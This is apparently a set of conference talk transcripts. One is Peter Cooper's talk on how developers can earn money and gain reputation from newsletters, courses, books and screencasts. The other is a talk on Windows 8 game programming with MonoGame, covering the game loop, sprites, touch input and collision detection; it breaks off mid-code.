But I use a system called InstantPresenter, which is a little bit like Adobe Connect, except I couldn't work out how to sign up for Adobe Connect because it's very confusing and enterprisey. So InstantPresenter is almost the same thing. It actually uses Java behind the scenes. So I use a separate browser just to enable Java for this. But then it takes your screen, it shares it, it does the audio. It has a really bad chat system in it, as almost every single webinar and training system does. So I then use a separate system. You might be familiar with Campfire, that 37signals does. Well, if you want something that's just as good as Campfire and it's totally free, then go to talkerapp.com. It's pretty much the same thing, but it's totally free. So we have a separate chat room for this and it works really well. And people ask questions and it's great. The only thing I would advise is if you do this, try and get more people involved. I've done it on my own and tried to keep an eye on the questions and think about where I am in the course. It's difficult. It would be nice to have a second person that just, you know, has experience with the topic and can go through the chat and answer questions and kind of act like a triage, essentially. So anything that's urgent can then come up to me. So I would advise you to use those two technologies. But if you just search for webinar software or training software or anything, you can find tons of stuff. But just make sure it's got screen sharing and all the things in it that you would want to do. Just the last thing I need to stress about this, even though you can make a lot of money doing this, it is very hard work. I found that after speaking for like three or four hours, even with breaks, you just feel completely wiped out and want to take the rest of the week off, which is funnily enough what I'll do after this talk, actually. Maybe it's just me, but it does take a lot of energy to run this and to do it competently as well. Right, one I want to pick up on is books. Has anyone here actually written a book that's been published by a ye olde publisher? We have one, two, three. So, you know, not the majority by any means. But is there anyone here that, you know, if you felt you were expert enough and you know, you kind of wanted the exposure, who here would like to have a book published by like an O'Reilly, that type of thing? Maybe some wavering hands. Okay, I'll keep this quick then, since it's not the majority of people. The reality nowadays, I mean, in the past, it was very much that gatekeeper thing. They were the big castle and you kind of had to storm it and come in with a really great idea and everything. The reality now is that because there's so much self-publishing going on and so many blog posts and people doing videos and people doing courses and stuff all on their own, publishers are struggling. This is something that obviously they never admit to, but I sort of get to work with quite a few publishers and see how things are on the inside. And they kind of really struggle to find good authors now who can constantly write about something and kind of know what they're talking about. So, you can almost go to any publisher. You can go to an O'Reilly, you can go to a Wiley or whatever.
And if your pitch is just even vaguely good enough that they think this is a book that's going to sell something and you're the type of person who can write and meet deadlines, even if you need an editor to spend all day fixing it up, you will kind of tend to get a bite. Do not do this for money. If you take all the books, like 1% of the books will make millions. For pretty much the rest, if you break even on your advance, you're kind of lucky. So don't do it for the money, but do it for the kudos. And there's lots of people that do self-publishing and they say, oh, self-publishing is the way to make money because you can take all of the dollars from what you sell. You're not fighting for like a 10% share. But the fact is there is still kudos in being published by an O'Reilly or something like that. Particularly if you wanted to leave Norway, for example, and move to the US, I know several developers who have used the fact that they have a book published with, I mean, this is a specific person as well, that they have a couple of books published with O'Reilly. It's pretty much the thing that says, okay, you apply for an extraordinary alien visa, as they call it, in you come, go get a job. So you need to be aware that that kind of issue exists and is still relevant. And especially for even perhaps going back to university, you might not have done computer science at an undergraduate level. But if you go back and say, you know, I want to do a PhD in some sort of computer science thing, they're going to look at your things and they're like, okay. You're like, oh, well, actually, I've written a book for O'Reilly about algorithms or something. Oh, right, come in. You know, there is still that kind of element of things going on. It's not quite as simple as that, but it will really help. So just bear in mind, books are actually quite easy to get into, but they're hard to write. You will need to have a very good schedule for writing them. Just because we have nine minutes left, I'm going to jump into a slightly different topic now. So I can't go through many more of these things, unfortunately. But I just want to talk about some places that you can promote this work. So once you've started to write your book or, you know, you're doing your podcast, which unfortunately I didn't touch on at all, or your course or things like that, where can you go and put these? Well, again, as I keep saying, I have a bunch of lovely notes for you. And I will show you that URL at the end if you didn't catch it. So places to promote. So a few things, you know, if you can get on Hacker News, that's great, but it's full of trolls and very weird people. And the chance of getting up to the top is kind of low nowadays. So many good stories miss the point, you know, and just don't get there. Although if you wanted to write something about Prism or the NSA, this is the week to do it and put it on there, because basically Hacker News has turned into Prism News, unfortunately. But there are other sites that are very similar that can also drive good traffic. So Lobsters is one. Looks just like HN, but it kind of has a more programmer-y audience. And I'm sure there are very similar things in the .NET world. Unfortunately, I'm not familiar with them. But go to sites like that, and if you can get the right title for things, it's an interesting way of promoting them. Reddit is very good. A lot of people kind of are against Reddit, like programmers especially, because they think it's just kind of full of meme jokes and cat pictures.
That is partly true, but there are some really good subreddits, you know, for individual topics like Ruby and JavaScript and programming in general and computer science and algorithms and things like that, where you can go in, you can either try and promote stuff through just using it normally, or you can actually pay the money to do this. So you can pay $30 to be like the kind of one of the main links on a subreddit for the day. And this might sound like a lot, but if you're really trying to get something off the ground, it can be a good way of gauging interest. Make sure you leave the comments turned on on your post, because then people will reply back, and if they can all say, oh, this sucks, then you kind of know that perhaps this isn't the audience for you and you made to take a different approach. But there are various other sites. D-Zone is one that's particularly popular in the Java world. I think.NET people are into it as well. It's kind of just a generic kind of programming link site. You can quite easily get stuff on there. And then there's similar things for JavaScript and Ruby as well. And these exist in most of the programming language communities. So get on there, get promoting. I have also done a post for Mozilla Hacks, which I've linked here, called How to Spread the Word About Your Code. Some of this can apply to your writing about code as well. This is why I hate the full screen thing. You just kind of have to remember that you're in it. So I'm going to take some very quick Q&A, because we have like five minutes left. And I'm just hoping you have some questions about your specific circumstances would be kind of cool. Like, you know, I'm doing this. You know, where can I go with it? Or maybe you want to start a podcast and you don't know how to get going with that. Which kind of makes me wish I'd cover podcasts now, because I've been involved with a few of those and have a few things to share. So anyone want to hit me with anything whatsoever? Not bottles or anything? Yep. Okay, that is a good question. Let's have a look. So my 90% of my work is email. And so obviously that's how I make my income. If you have emails that go out to a certain number of people, so my kind of network is 120,000 subscribers, you can basically charge anywhere between $10 CPM up to, I know there's a company called Frillist that does fashion emails in the US, they charge $300 CPM. So if they had 100,000 subscribers, they'd what, be making like $30,000 or something like that, like on a mailing, which is ridiculous. I've probably multiplied that wrong. But basically you just take that multiplication. You know, you have a certain number of people, you can sell ads for a certain amount. And that is exactly what I do. Just to give you a very basic impression of what this actually looks like, of course, with JavaScript Weekly, for example, so there's about $50,000 on here. I'll just click on a random issue. And it's very, very simple. So you have some headlines and you have all this code and, you know, links to projects and things to read and stuff like that. But then here is a sponsor link. And actually this is someone that I kind of partly stole the course idea from as well. Called Mark Andre Konea, who does courses about Node.js and programming language implementation and stuff like that. And he, you know, sort of paid money to be in this. So currently, like for example, my Ruby Weekly one is booked up until the end of the year. And I don't want to take any 2014 bookings yet. 
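The sponsorship arithmetic mentioned above is just the subscriber count divided by a thousand, times the CPM rate. As a quick illustrative check of the figures quoted in the talk (the rates and list sizes are only the examples given, not real rate-card data):

```javascript
// CPM is the price per thousand recipients, so one mailing earns (subscribers / 1000) * CPM.
function revenuePerMailing(subscribers, cpm) {
  return (subscribers / 1000) * cpm;
}

console.log(revenuePerMailing(100000, 300)); // 30000 -- the $300 CPM fashion-email example
console.log(revenuePerMailing(120000, 10));  // 1200  -- a 120k list at the $10 CPM low end
```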
People keep saying I'm undercharging. So it's good because I can run this as my full business and then I get to kind of code almost like as a fun thing on the side to just keep up to date with things. And from the rest of the list, and again, I hate this, there must be a keyboard shortcut for that, but I'm not remembering what it is. Oh, screencasting, of course, because you may have seen things like PeepCode, Tekpub, I know Rob Conery's here. I don't know if he's actually in this room. He said he was going to come along and see. Didn't you, Rob? You know, these people are making money out of subscriptions. So PeepCode, they'll sell their screencasts. I think it's $12 now. So, you know, $12, if it's something like AngularJS or Ember or something that's really popular or a .NET topic, which I don't think he does, but you take that $12, multiply it by how many people buy, 1,000 people, you make $12,000. And if it's a screencast that's an hour long and it's perhaps taken you a week to produce, making $12,000 isn't too bad. You just need that audience to promote it to and the ability to edit them together. And I think Tekpub takes a slightly different approach in that they only do, no, they don't only do subscriptions, but they really push the subscriptions heavily. So, you know, if you're paying like $100 a year to get access to something like this, and again, you end up with 1,000 subscribers, which is not that difficult really. I know quite a few people doing this. Again, you've just made $100,000 in a year. It kind of becomes a full-time job, but it makes money. Blogging, again, you can run ads. Podcasting, again, you can run ads, but I've had zero luck with doing that. You can put promoted links on Twitter. Don't, it just kind of sucks. People don't like it and will unfollow you. And of course, you could start charging for webinars and e-books and things like that as well. But it's pretty much the case that you can try and work out a way of charging for all of these things. But the way I like to do it is I like to use things that are very, very mass media, like Twitter and Facebook and things like that. That's totally free, to get as many subscribers as possible. And then push them into things, or not push, but lure them into my courses. So that is the main reason I actually started up a Ruby newsletter, is so that I could build it up, get a certain number of subscribers, and then I knew that each month I could say, go join my course. People come to the course, pay me $400 or whatever, as long as I get like 20 people, bam, that's $8,000 or whatever. So that's kind of like long-term thinking about the income over time. So I would advise that strategy. I'm actually glad the room isn't totally full because everyone might try and rip this idea off. So that's good. John. Yeah. Just for anyone who's watching it on the recording, John just mentioned that, you know, sometimes you want to think about the divide between spending time on actually, you know, working on the tech and making the videos and learning about the code, and then the actual back-end kind of production, running a business kind of side of it. This is very true. I also know people that perhaps they're worried that they've gone too far into the publishing side of it. So they've kind of started up a screencast site. They charge $9 a month. They get a few hundred subscribers. They think, great, this is my full-time job now. But then they panic that, oh, no, I'm not working on, I'm not doing consulting anymore.
I'm not working on any client projects anymore. I'm not actually learning the lessons I need to use to put into that content. So you do need to come up with the divide. And the lucky thing for me is that I, even though I shouldn't be doing it, I've kind of kept control of building all my own technology for doing the email newsletters. So I still kind of have a client, and it's me. But yes, long-term, that's not ideal, which is why eventually I just want to start throwing money at other people to, you know, actually with the knowledge and to do this stuff for me. Anything else? I mean, if anyone sort of, you know, has any extra questions and things like that, then feel free to speak to me. I just wanted to end with a quote, and that is to sort of try and practice, get you to try doing something. The vision must be followed by the venture. It's not enough to stare up the steps. We must step up the stairs. So, talk, and this is the URL you can go to, and it will give you tons of links, things I didn't even get to cover in this talk. So thank you very much.
|
Most developers prefer slinging code to words or video, but writing books, blogs and newsletters or even releasing the occasional video on YouTube can open up significant doors and opportunities. Part-time programmer and publishing and media geek Peter Cooper looks at the ways developers have got ahead through sharing what they know and covers the practicalities of how to do it, what not to do, and what first steps you can take.
|
10.5446/51491 (DOI)
|
All right, can you guys hear me? All right, everyone in the back as well? Perfect! So it's great to see this many people attend my session here at NDC. Did anyone attend my session last year? No one? All right, that's cool. The reason behind this image is that I like to eat well, I like to eat a lot of food, and I needed a little bit of extra money every month to buy whatever I need. So to make this happen I decided to start creating some games, and those games didn't make me very rich, but they gave me the food I need every month. My name is Petri Wilhelmsen and I'm half Finnish, let's see. I'm half Finnish, so naturally I have this great urge to create games. I love creating games, mobile games, and Finnish people, they're awesome with that. It's also cool that my crew manager here is also Finnish, so that's nice. Anyone else Finnish in here? Oh, all right, cool. So how many of you guys have created games before? All right, so keep your hands up if you did anything for Windows Phone. And what about Windows 8? All right, cool. So today we're going to talk about game programming for Windows 8. I'm going to touch some technologies. How can you create games for Windows 8? How can you use different engines? What technologies do you have and how do you actually produce them? I've been doing a lot of game programming before and I know that it includes a lot of math. Today I'm not going to touch a lot of math, but I'm going to go into some small, simple topics which I think you guys should have known since some kind of high school, so you should be okay. But if not, fear not, it's not going to be hard and I'm going to explain everything quite well. So I hope you're awake and that everyone got their cup of coffee and are ready to start game programming. So I'm going to start by talking a little bit about myself. I'm going to show you some projects I created myself and some mobile games, and I'm going to touch the technologies. I'm going to touch MonoGame and some simple shader programming including that. And I'm also going to talk about my experiences as a game developer from before. So I hope you guys are ready. My name is Petri Wilhelmsen, and the reason for my strange name is that, like I said, I'm half Finnish. I have a twin brother, he looks exactly like me, but we're completely different. I'm more of a computer Jedi guy and he is doing law school. But we look the same. He got a Norwegian name, I got a Finnish name, and I also found myself a Finnish girlfriend, so I'm kind of following the Finnish path to everything and I'm doing mobile games. I do work for Microsoft and my title is computer Jedi, or internally at Microsoft people tend to call me a technical evangelist. I'm not going to talk much about directly Microsoft stuff today, but just so you know, I'm working for Microsoft and I'm standing down at the Microsoft booth. So if anyone has got some questions or wants to talk about game programming, come and visit me and I'm happy to take a cup of coffee with you. My Twitter handle is Petri, so just ask me questions there as well. I tend to be pretty quick in answering questions there. I do love programming and I do love technology and I do love the Commodore 64. Did anyone do the Commodore 64 in here? All right, cool. I'm going to give you guys a link. So before this session I actually created a blog post on my blog. I'm going to give you the URL so you can go in there; it contains all the resources and examples from the session. The slide deck will be uploaded later, but it's not there yet.
It also contains links and making off guides so you can get yourself up and running pretty quick. I'm going to share it to you pretty soon. But this is where I started. I started doing Commodore 64. I got it from a dad. We actually hit hidden it away somewhere we know that I would find it and I did find it and I also nagged him for two years and creating all the games that I drew on paper. Once we got a little bit older, me and my twin brother we tend to sit down in the living room and code on the Commodore 64 copying articles from the C64 magazines. So we tend to write two hours and then we switch and he wrote two hours and then me wrote two hours and we hit compile and hopefully it run. And then we had a pretty cool game like some kind of a fire game where I had to put water on fire. It was pretty cool and I did love it. And my dad continued to create games for me as well. And after a while, when my class started nagging him or drawing their own designs for my dad and asked my dad to create them for them, my mom said no, you need to spend more time with your family and not just your Commodore 64 and create games for my class. So I had to create them myself and learn how to do it. And I got a book from my dad during Christmas. It was called UN Dino Learns Basic. So it's basic that children's book on basic programming. So it got me started. Right now, I still do some graphics programming. Part of the demo scene. So I create some demos using DirectX and OpenGL. But today I'm going to talk about more high level stuff to actually get your game out quickly and get you guys to create game. So after this session, you're going to have to spend around 15 minutes and then 10 more minutes and you have your first game up and running. And I'm going to help with that. I created some project. This is Project Binaryman. It's inspired from the Commodore 64 age. And it's very hard. Like every Commodore 64 game, it's not like the new game so you can just push on buttons and you completed the game after two hours. Here we actually have to have quick reactions and move fast and think. I'm going to show you the trailer for it just so you see how it is. This is for Windows Phone. There's a free version as well for those of you guys who have the phone. So your job is to actually fly through TP cables and wireless networks and fight bugs and viruses and attackers that penetrated a huge mainframe system. So you have to take it back. And you do this by doing flood filling. I had a friend of mine who created a game called Flood Filler for Windows Phone. His name was Yvonos Follosa. And I was inspired by that and actually liked it. And I thought how could I bring this to the next level? Yes, by creating a platform of formers. This is actually a flood filler. We have to shoot different colors and different parts and flood stuff. Once the entire object got the same color, it falls apart. The point you get is based on how many turns you actually had to do before the block was destroyed. So the less stops, the more points you get. I also created a simple game called Luminite. It's based on a template for Windows 8. It's written in HTML5 and JavaScript. And I'm gonna show it to you. I installed it earlier. I'm gonna see if you guys can see this. Let's see here. Alright. So this is Luminite. I wrote this game around five hours and I produced a template of it so you can download it from free from my blog if you want to create some Windows 8 games. What you have to do here is to simply just tap the fly. 
And every time you tap it, you see that the combo is going up and you get some points. And every fly has like five lives before you deplete it fully of life. You just have to click it and there's different game modes. So you can add more flies and total chaos. You can click around with your friends and family and whoever. I found out that my cat and dog really liked it. They actually attacked my Surface Pro. So I had scratched my Surface Pro because my cat just... But it's okay. Cats are cute. And once this game is over, it actually uploads the score to Windows Azure. It's a simple solution. It would work. I just connect to Windows Azure solution, send up the score and provide a high score list back. So to keep in five seconds you're gonna see my score compared to the rest of the world. And the high score system was actually created in just one hour. So it's very simple. You'll see that I'm the leader of course. I'm a master at this game and tapping and being accurate. You get your accuracy calculated out and everything. And the longest combo. So it's free. You can just download it for Windows 8. It works with a mouse but it's best with touch device. To continue, I'm gonna show you one last project before I dig into the code. And it's called Bandainos. With this game I participated at the gathering last year I think. And I got second place in the game development competition. I was happy about that. The game is finally finished. So you guys can actually go and download it. There's a version out there which is all free. So you can just go and try it out. So I got the idea when I was in Finland with my girlfriend and she was searching for cute dinosaurs. And then I went into sauna and had a beer with me. And this idea just started coming up into my head. And I just have to see if I can connect to the internet here. Might take a little bit because it's slow. It's not that important. So the meaning with this game is based on lemmings. You have to get an egg from A to B. Where B is a mother dinosaur who has lost her egg. You have to roll the egg around and then place dinosaurs to create a path for an egg to get to the finish line. So let's see if this one... You can just probably load in a background while I continue. You can show you guys the game later. So how do you create games for Windows 8? You can use HTML5 and JavaScript. Did anyone do that? HTML5 and JavaScript in here? Does anyone know JavaScript? Alright, that's a lot of people. That's good. So you guys can create games really simple. There's a library called createjs which is very simple to use. You can just follow the tutorials and get your game up and running pretty fast. I know the Atari page. You can go into developer.atari.com. They actually have some excellent tutorials on createjs if you want to create games for web browsers and also Windows 8 because JavaScript and HTML5 is supported out of the box. You could use DirectX 11. For those of you who are doing C++ or anyone in here who is doing C++, you could go for DirectX 11.1. It's very good. I've been doing DirectX since version 7. I do really love the library. It's great for producing hardcore graphics but it's quite advanced and it takes time to actually get a result up and running. I tend to choose XNA which is quite simple. Before starting Microsoft I actually were an MVP on DirectX and XNA. I do know the platform pretty well which made XNA a pretty obvious choice for me when it comes to creating games. 
The sad part is that XNA is not supported in Windows 8 but luckily we have monogame which are basically Ctrl A, Ctrl C on the code and Ctrl V into the monogame project and you run after importing all the graphics files and it works. The game Bandinos was actually created for Windows Phone and I spent one week on importing it from Windows Phone to Windows 8 including redesigning all the interfaces and so on. More about that later. You could also use engines. Did anyone know about Unity in here? Unity 3D. You can now start using Unity for Windows Phone 8 and Windows 8 programming. You can just fire up Unity and export and you're gonna get Visual Studio project generated for you which you can go in and edit the metadata and everything you need to get your appx file and then you can just upload the appx file to the Windows Store. Wait a week and you get your app out and running or maybe two days. It depends on the testing process for Windows Store. You could use Impact.js. It's a library called from I think it's a Russian developer. It costs $99 for a lifetime license and you get all the updates going. So I use this a lot and it's very simple. You get this special way of creating games but it's easy to learn and you get a really neat level editor in HTML5 that you can actually just draw your levels in your game. You also got Game Maker and a lot of other engines that you can use to create games. But as I told you today I'm gonna focus on monogame and I'm gonna show you quickly how to create a game with monogames. I'm not gonna show you how to install monogame and download it. I have a link on the blog post that I posted on my blog where you can just click it and you get all the steps you need to set up monogames for Windows 8. It will take around five minutes to do it so we can just do that after the session. Follow that guide. So to create a game you really have to think differently than you do in a web application or a Windows form application. How many did the normal programming for Windows? Most of you guys right? So every time you click OK or every time you do an input in an input box the game gets the area we draw gets refreshed and redrawn. In a game you actually have to redraw the screen all the time like 30 to 60 times every second. So you actually have to switch from doing the click OK fire event mode into thinking milliseconds. You have around I don't know 20 30 milliseconds per frame so you have to really think about okay I have to do stuff in those milliseconds and I have to do it fast. You don't want to have 10 million lines of code running every single frame when you want 60 of those rendered every second. So I want to introduce you to the game loop and it starts with an initialized function. This is common in about every game engine you have initialized function. You start there you set up the database connections maybe your Azure connections you log in you set up some variables and so on. It happens one time when on new levels level loads or when the game starts up and so on. And you have load content once the game is ready to load the images, the music files, sound effects, 3D models whatever you have you do the load content. Once the load content is done you are actually ready to start rendering and doing the game loop. So a game loop typically the happens like this you have update and you have draw. In the update loop you actually calculate the game logic and in draw you draw it. Did anyone understand that? In the update you calculate the logic in draw you draw. 
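For reference, here is a minimal sketch of what that loop looks like in a MonoGame/XNA game class. This is the generic template shape rather than the demo's exact code, and the class name and clear colour are just illustrative:

```csharp
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Graphics;

// Minimal MonoGame/XNA game skeleton showing the loop described above:
// Initialize -> LoadContent -> (Update / Draw repeated every frame) -> UnloadContent.
public class Game1 : Game
{
    GraphicsDeviceManager graphics;
    SpriteBatch spriteBatch;

    public Game1()
    {
        graphics = new GraphicsDeviceManager(this);
        Content.RootDirectory = "Content";
    }

    protected override void Initialize()
    {
        // One-time setup: services, connections, variables, per-level state.
        base.Initialize();
    }

    protected override void LoadContent()
    {
        // Load images, sounds and models once the graphics device is ready.
        spriteBatch = new SpriteBatch(GraphicsDevice);
    }

    protected override void Update(GameTime gameTime)
    {
        // Game logic only: input, movement, collisions, scoring.
        base.Update(gameTime);
    }

    protected override void Draw(GameTime gameTime)
    {
        // Drawing only: clear the screen and render the current state
        // (the demo clears to a sky blue; any Color works here).
        GraphicsDevice.Clear(Color.CornflowerBlue);
        base.Draw(gameTime);
    }

    protected override void UnloadContent()
    {
        // Clean up loaded content when the game shuts down (the "exit" step described above).
        base.UnloadContent();
    }
}
```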
So a big mistake a lot of developers does when creating games is to do logic in the draw loop. I don't understand why because draw is draw you draw stuff. This result in flickering and maybe some unsynchronized movements in your screen because you do some things in the update function. Update might be called maybe two three times more than the draw loop depends on how you do it. Update goes all the time whenever it can because you want to have precision and then you do the draw once the previous screen is ready to be drawn or the next one after the previous one. So update updates a lot of stuff and draw draws it and I don't want to see anyone updating stuff in the draw function. Because it will create bugs for you that are very very hard to find not even an I++ or something like that. Once a draw loop is complete maybe you press escape maybe you click the exit button maybe someone called or something happened maybe a phone shuts down you call the exit function. The exit function just cleans up the memory that you use it cleans up the loaded content and gets you out of the game and unloads everything. So that's the game loop. It's quite simple you just have to think that you are doing small stuff fractions of stuff every frame that you draw. So I want to show you how monogame works and I'm going to start by showing monogame by loading a texture and rendering it on a screen. So I'm going to show you the demo. See here. All right how's the size of the text back there? Do you guys see? Yeah? Okay good. So if I just press play here what I did was actually create a new project and then you can choose the monogame and can choose the Windows Phone 8 project or a Windows Store project. What I also did was to implement the content pipeline so I just added some textures in here that I can use to render. So out of box pressing play on this will initialize it will load content and it will start updating and drawing the screen. Right now I'm drawing a blue box. It doesn't look very good but a lot of stuff happens behind this. Just to show you the code of this one. You can see that this one starts by doing initialize. It doesn't initialize anything yet it's just empty. I do load some content. It's not any content here yet with exception of a sprite batch. I'm going to tell you what a sprite batch is. Then I have the update function and the draw function that clears the color to a sky blue color. What it does is to go into every pixel on the screen and set it to this color. So to load a texture in here I need to have a sprite batch. A sprite batch comes by default when you start a new project. You could remove it if you do not need it. A sprite batch is for drawing 2D sprites. If you are doing a 3D game you're going to render 3D stuff but you might need a sprite batch to draw the UI like elements on the screen and so on. Then you need a sprite batch. A sprite batch function is to help the GPU. When you draw an image to the GPU you actually start a pipe into the GPU and say hi I want to open this pipe and I want to send in a picture. A 3D card said yes okay come and bring it on and I send it in and it draws it and then I say okay I'm done. If you do that for every single image that you draw you're gonna have some slow performance in the game because you open and close that pipe maybe ten times or a thousand times per frame. Every time that you're drawing a frame you actually open and close the pipe. 
A sprite batch is there to open a pipe into a sprite batch which is rather cost-less and then we send in all the sprites to the sprite batch and we send the sprite batch.end. It closes the sprite batch and then it sends all the images to the GPU at the same time. So just remember to try to use one sprite batch. You can send the sprite batch into different functions and use it all over the code to help the performance of your game because you are writing games for a tablet or a mobile phone or a PC and you need extra cycles that you can get. So to load an image I need to have an image here. Just drag it into the content project and give it an asset name. It's automatically the same as the file name with the exception of the.png or.jpeg.end. Then I need to create a texture 2D which will contain a texture variable which will contain a texture 2D object. To load this you do that in the loadContent function. Do not load stuff in the updateLU as well because then you will load it every time you refresh the screen or so on and it will make it really slow. To load the texture what we need to do is to call the content function which actually accesses this one gameContent. It's preset up so you can really easily adjust to call this and it says load and I want to load a texture 2D called dyno with an asset name dyno. So what this does is you just put the dyno texture as a bit map into the logo texture texture 2D element. Then I need to use the sprite batch to draw and then we can do this. I call the sprite batch and saying hey I want to draw this to the sprite batch. I'm going to draw the logo texture and I'm gonna draw it in the middle of the screen so what I'm doing here is to take the width of the screen and divide it by two and then I have to subtract the width of the texture because the texture is getting drawn in the corner. I want to be in the center and I want to have the color white which then takes care of the original colors. It takes the color of the original picture and times it by white which is one so you get the same color that you did in the Photoshop or whatever engine used. And here we are. A dinosaur render in screen. That's three lines of color in monogame and XNA. Nothing very interesting but you do get your image up and running and this could be like the logo screen of your game. So again what we're doing is to create a texture 2D object, load it using the content.load. You start the sprite batch and you draw to the sprite batch and once you call the end function the sprite batch ends and draws everything to the screen. So what about input? What about making stuff happen on the screen? You could create a coordinate and move it in the update loop and draw the image on that coordinate and it will move. So let's take a look at how that works. So first of all I'm just going to show you how the project looks like now. I only did a few more things. I rendered the dinosaur is still in the middle there. I added a texture that is the ground and other than another texture which is the background. I did the exact same thing as drawing the dinosaur but with the other textures instead in different coordinates. So just to show you how it looks like in code because we're here to code write. I draw the ground texture and I do it three times because I'm just tiling it like this and I take the width of the textures and times it by the tile number here and just moves it automatically this way. I do the same for the details as well the trees and so on. 
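A compact sketch of the loading and drawing being described here. The asset names "dyno" and "ground" follow the demo, but the field names and exact arithmetic are illustrative, and this assumes the game class skeleton shown earlier:

```csharp
Texture2D logoTexture;
Texture2D groundTexture;

protected override void LoadContent()
{
    spriteBatch = new SpriteBatch(GraphicsDevice);
    // Load by asset name (the file name without extension) from the content project.
    logoTexture = Content.Load<Texture2D>("dyno");
    groundTexture = Content.Load<Texture2D>("ground");
}

protected override void Draw(GameTime gameTime)
{
    GraphicsDevice.Clear(Color.CornflowerBlue);

    spriteBatch.Begin();

    // Tile the ground texture three times along the bottom of the screen.
    for (int tile = 0; tile < 3; tile++)
    {
        var groundPos = new Vector2(
            tile * groundTexture.Width,
            GraphicsDevice.Viewport.Height - groundTexture.Height);
        spriteBatch.Draw(groundTexture, groundPos, Color.White);
    }

    // Centre the dino; Color.White keeps the texture's original colours.
    var dinoPos = new Vector2(
        GraphicsDevice.Viewport.Width / 2 - logoTexture.Width / 2,
        GraphicsDevice.Viewport.Height / 2 - logoTexture.Height / 2);
    spriteBatch.Draw(logoTexture, dinoPos, Color.White);

    // End sends everything to the GPU in one batch.
    spriteBatch.End();
    base.Draw(gameTime);
}
```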
Then I draw the dinosaur texture and I draw it at the dinosaur position. What's the dinosaur position? It's a vector to the object so you can see it here. I set it to be on the center of the screen like we had before and also on the position of the height of the screen and I subtract the height of the ground and the height of the dino to make it just on the ground. Then I add the fire plus to make the feet a little bit inside the ground. If I press play here you can actually see that the feet are a little bit below in here. Just to make it look like it's standing on the ground. What I want to do now is to start moving this dinosaur and I want to move it by tapping on the size of the screen and if you move towards where I'm tapping. Back to the game. Code. We need to create something that checks that. Okay, did I just press the screen and what should I do with that touch? It's basically the same code for doing a keyboard. You can just get the state of a keyboard instead and say if the button A was pressed do this and the gamepad. You can implement gamepads. You can connect the Xbox to a USB and you can actually support it in all your Windows A dApps. If people have a tablet like a Surface RT or a Surface Pro it does come with a USB. You can just connect the gamepad and people can start playing. What I'm doing here is to create a touch collection called touches and I do a get state on the touch panel and the touch panel just checks where is the person pressing. Am I having like maybe 10 points here or touching one place and it returns all the coordinates or touch locations of every point of touch. Then I can just do a simple for each loop on the touch location and I can check the position by doing the T that position and this is a 2D coordinate which contains the X and Y position of where you actually touch the screen. So what I'm doing is to check that if I'm touching on the left side of the dinos position I want to subtract the dinoposition by this strange long thing here. I could just do like 10 here. If we go 10 pixels every time that you do an update. This would be bad because a lot of hardware runs on different hardware. So sometimes the hardware might be faster or slower and if you do the minus 10 if you always do the minus 10 whenever. So it will make the game really quick on fast devices and really slow on the low performance devices. So they didn't want to install all game they really really loved like a DOS game or something from the decade and you press play on this game over before you even see the first screen. It's because the processor the computer is so fast and the game has been created to do the timing. It just does the cycles which makes the game really really bad on hard devices. Yeah, it would work. Yeah, so this long sentence here is to sync your game with the clock and you really do want to sync your game with the clock. So what we do here is to get the game time. It comes default as a parameter to the update function. You don't need to know where it comes from. It just is there and it's correct. Just know that and elapsed game time is the time since the previous frame. So if a frame takes a lot of time to render this one will be bigger which may will also make the gap bigger. So if you move one step maybe 10 15 pixels more than on a fast device. And I just convert the time to total second. You can actually do a lot of other things. Hours, milliseconds, minutes, seconds and I multiply it by 200 and 200 should be maybe a speed variable on an enemy object. 
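A sketch of the touch handling and the frame-rate-independent movement just described. The 200 matches the speed constant mentioned in the demo; the field names and the left/right rule are an illustrative reconstruction:

```csharp
// Requires: using Microsoft.Xna.Framework.Input.Touch;

Vector2 dinoPosition;
const float DinoSpeed = 200f; // pixels per second, independent of frame rate

protected override void Update(GameTime gameTime)
{
    // Seconds elapsed since the previous Update; multiplying by it keeps
    // movement speed the same on fast and slow hardware.
    float elapsed = (float)gameTime.ElapsedGameTime.TotalSeconds;

    TouchCollection touches = TouchPanel.GetState();
    foreach (TouchLocation t in touches)
    {
        if (t.Position.X < dinoPosition.X)
            dinoPosition.X -= DinoSpeed * elapsed;   // tap on the left: move left
        else
            dinoPosition.X += DinoSpeed * elapsed;   // tap on the right: move right
    }

    base.Update(gameTime);
}
```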
So you can control the speed because 200 is the speed and that's the speed across all the device that you actually create a game for. So this line is magic and you have to just love it when you create games. So what I'm doing here is just to alter the dinoposition and the dinoposition is as I said a 2D vector object and then I render the dinotexture at the dinoposition. And you could then of course move the dinothing into a class called player and so on to make everything a really nice architecture wise. But I'm not gonna focus on that today. So that's input. It's just simply get state and you go through all the coordinates. So what happens when you collide? There's nothing, there's not an event you can add and say that yeah there's an event, a collision, you have to implement this yourself and how do you implement this? You do it by math. Luckily MonoGame and XNA comes with a library that helps you with bounding box collision. As you can see the bounding box collision is not perfect. You have some black areas there which will trigger your code when stuff enters in there. So it's not pixel perfect according to the PNG image but it's good enough for a lot of cases. What I would have been doing here is to create a rectangle that leaves the head and the tail outside to get it more perfect. You just have to optimize based on the textures in the game that you create. And then I have another object and I want that object to be collected when I'm crashing it. So I have an intersection once those two bounding boxes overlap. You could do it another way as well. This is one of the math slides. It's not very hard. What you do here is to have a position of an object A and a position of the object E. So A is the dinosaur and B is the artifact that you want to collect. And then you have the radius based on the size of the image. It could be like the image divided by two. You're going to get this round thing around the entire image. And what you do here is to take the distance between those two points and then you check if that's distant is less than the radius on the point A plus radius on point B. So if the radius on those two objects are bigger than the distance, you know that there's an intersection between those. You guys with me on this? Yeah, that's great. If not, I'll have to help you out afterwards because I use this collision method a lot in my game. I just use the square root and that's kind of the performance cost. So it's not very expensive to do this the right way. So how to handle collision? What I do here is to actually create the rectangles. So I take the position of the object, the vector to the object, the vector to the coordinate of the object, and then I take the width and the height of the texture that I loaded because I have those variables which makes it really simple to get rectangle. So I create a rectangle on the position and then the width and the height of the object. And I need two of them. I need one for the thing that I'm going to collect and one for the player. And then I have the rectangle library comes with a function called intersect that you can call on another rectangle that returns boolean value to false based on those two rectangles if they are actually overlapping. So just to show you my little example I have on this. You can see the code in action. So right now I just press play just to show you where I am. What I've been doing is to add a list, just a real list of vector to the objects and I have ten of those. 
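Before going further, here are the two collision checks being described, written out side by side. This is a sketch with illustrative names, not the demo's exact code:

```csharp
// Circle-vs-circle: collide when the distance between the centres is smaller
// than the sum of the two radii (a radius of roughly half the texture width works well).
bool CirclesCollide(Vector2 centerA, float radiusA, Vector2 centerB, float radiusB)
{
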